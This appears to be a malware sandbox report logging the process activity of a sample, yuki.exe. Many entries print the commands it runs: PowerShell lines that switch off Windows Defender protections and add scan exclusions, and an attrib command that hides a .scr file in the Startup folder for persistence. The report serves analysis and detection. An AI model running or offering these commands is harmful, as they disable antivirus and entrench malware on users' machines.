Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Users\user\Desktop\yuki.exe "C:\Users\user\Desktop\yuki.exe"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr" /S
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\appdata" & powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\local" & powershell.exe -command "set-mppreference -exclusionextension '.exe','.py'""
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\appdata" & powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\local" & powershell.exe -command "set-mppreference -exclusionextension '.exe','.py'""
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\appdata" & powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\local" & powershell.exe -command "set-mppreference -exclusionextension '.exe','.py'""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\appdata" & powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\local" & powershell.exe -command "set-mppreference -exclusionextension '.exe','.py'""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8219570 cpuid 0_2_00007FF6C8219570
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Util VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography-43.0.3.dist-info\license_files VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\misc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\lz4-4.3.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\lz4-4.3.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\lz4-4.3.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\lz4-4.3.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\lz4-4.3.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\lz4 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy.libs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\_core VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry-24.6.1.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry-24.6.1.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry-24.6.1.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry\databases VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry\locales VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry\locales\ab VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry\locales\ab\LC_MESSAGES VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry\locales VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry\locales VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry\locales VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry\locales\af VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry\locales\af VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry VolumeInformationJump to behavior
